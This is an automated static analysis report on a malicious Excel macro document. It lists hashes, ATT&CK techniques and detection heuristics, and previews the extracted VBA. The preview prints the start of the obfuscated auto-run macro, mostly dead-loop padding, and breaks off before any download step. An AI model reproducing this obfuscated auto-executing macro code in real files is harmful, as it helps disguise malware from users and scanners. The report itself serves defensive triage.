Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5955f821356e45f7…

MALICIOUS

Office (OOXML)

31.4 KB Created: 2018-10-22 00:01:05 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2019-01-20
MD5: 252edf8ebdfbd1c992dfd8d570fa176c SHA-1: d2b98b1fac0d72e146c06b6f22641fc0052aaedc SHA-256: 5955f821356e45f71788a755902e7ab142c3a6214ec2adc755abbe30f6c44985
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The OOXML file contains a Workbook_Open macro, a common technique for executing malicious VBA code upon opening the document. The macro utilizes CreateObject and Shell() calls, indicating an attempt to download and execute a second-stage payload. The obfuscated nature of the VBA code prevents a more detailed analysis of the payload's specific actions.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 17912 bytes
SHA-256: 650809d191393e911a70eecaa8d9054b90e89a4a864f739fc8177279e69aacd3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
MwUdGhjV7Hl4.CfWYp5j55jJHPwNGUUSr
While 6 = 719
Dim i3wKUElOGVkb3UtGBjJEaPnvyQr9W64AXJ5Is As Variant
Wend
Dim KCiRSwg8rO4C As Integer
While 24 = 6780
Dim EEuJLOQN_UDVl1JajDqYjWyfjwGcExFBx6PyGzJ As Variant
Wend
Dim m5sz9KoakEVn As Integer
While 17 = 7171
Dim hcarPNiXGxGJMBhpjTRs2vvon9fWFo1_ZbbSchh3Ouvxvgk7m81Pvmu As Variant
Wend
Dim vqvCPqKPb6FsuhN As Integer
While 27 = 7191
Dim LAuXbE_72EWitHwjMwpplpeQKDdR2nwyWWuy As Variant
Wend
Dim dVIous473FaGnT As Integer
While 18 = 4292
Dim leecLXkp_LQgJVV7Ezl_42vgXDlUmfu1tftNSAHuD_ As Variant
Wend
Dim mqnU6_upNCSD7s As Integer

While 28 = 3421
Dim s7_GvOBgaZvnkFmDpz6yND2BGgj7Pqfoi_eU6A9wB_NM As Variant
Wend
Dim hPbmCJUbFFdnDB As Integer
While 25 = 1755
Dim Mo_Os3E_jkPFo1GwHynczD64EUDhaezP As Variant
Wend
Dim AtG6xeTbK2Bu As Integer
While 25 = 5404
Dim Cpj9STyYgHIrJIVxglDt_LnF_zTRSAnK4GCobiG As Variant
Wend
Dim IA1U2iYunHe4 As Integer
While 28 = 9569
Dim hwPuzAc8b_fEfc8xBFqU8d4sH1vfi_oIwEEWl As Variant
Wend
Dim VLm8joIdtxWkk As Integer
While 28 = 7821
Dim rgZH5D3gl8N7XWSUQZWiJn4CVWxsMWBW48UGrmI As Variant
Wend
Dim AdDtMWAKPy As Integer
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "MwUdGhjV7Hl4"
Dim AEiYjAE1VSv_DurgYbyzM9xJOAUdwgIDYqZvyVCKMOe5JUW9834cAdBAQXH As String
 Function GaW_AYDlWvgNHRM61BYBKmmOVDE4onUKg4E6mW2gPdT1luUtePf8uNlcw(ziY8uTLJMi9ch3ORN47ixFMvtmleBpip_ByVwj_vzuBEdmXJwPlUDGyrTlMGqpGg9RWfC2em3JsC_GQFNaquDMk6KFBJU2DHldFKN2F5u9a3XvmLTF2O8VbtpZS6zTP)
While 17 = 8749
Dim o_mygS4oK7M1eDOCVttfGnFAPZGUr2XGhAriy8XLMU5SMTi As Variant
Wend
Dim QjVudzjc_2 As Integer
While 12 = 4389
Dim lgEJg6SgERdUoMXTfQurvw5zzuTF4P7gqpKYQAoYkvFB_55GUHRQqQExlOT As Variant
Wend
Dim vjKmyT6m8B8BelT As Integer
While 14 = 6473
Dim F_p3t4yLut8oyXjVvBo2yYGQpHQ6EVFwoVJ_GsdZ6WZ21oFNVnJ9y As Variant
Wend
Dim sep1WKkl3EWmI9a As Integer

 Dim rdIENZmhCOdaTfmZN2NcdbAbOzW1tNywI_6Z4YJIztDFJXMoPFp8EUXNcpzWCvxwZqQOjLfxqDmtW4P1lqimh1qwpp7LivFC6PocF8_Dj1PArm
While 4 = 2990
Dim MdNCgN5a8NZ_AChaJF851cLtf2xCPCNpon_1YGaiwCqk7KiiSnKeKDjt As Variant
Wend
Dim PdenZ2I5_sSV As Integer
While 22 = 1752
Dim BpBCnWGwukvTRNsl1rdkDOj5kvH53vkM1LflkG As Variant
Wend
Dim x5v8oqJUJGfDPNq As Integer
While 11 = 6275
Dim RvEFZ2MK399gc_qF_r1opPP4LZY8wUqS9H4te As Variant
Wend
Dim dp8js38pHqP As Integer


   Dim USTS4Ye_qHJysR4SMnCZ3M6mbTKjeuRz9yjXIFYkvSJpG_9n6DfYkdSFVpziL5h5zTz4
While 22 = 2165
Dim cAeUYhABdK3_aOXgQnhSJ7jeA2_6WRMC As Variant
Wend
Dim sHdvyT4YG2 As Integer
While 8 = 3718
Dim ORjpfTTTpAiV_eY_SfbDmJ8zPQtlq6sHKRqQ4TUtkBkKbUD8Uy_W7CMDTtX As Variant
Wend
Dim MiqmsPZJvxGE As Integer
While 6 = 6155
Dim IqbkivV5MvO25UJH_l6H5FJ3W24AJPIMsALNikdhWc9vau As Variant
Wend
Dim x5OApJJ6CC As Integer
   
While 2 = 5091
Dim fhLp1Ts7lAH4G5hbGWuaGWalD9uHi8Cv7IrAWwpBsBIYk3vSbMBvJk4G As Variant
Wend
Dim Eil1ijVm8U As Integer
While 26 = 8134
Dim Lg_Tprq_LB_IK
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 51200 bytes
SHA-256: 6ad19b581d59deca15ef5dab2c0d6f437a3c4cb08619763ee1cd0b2efa9f57e4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).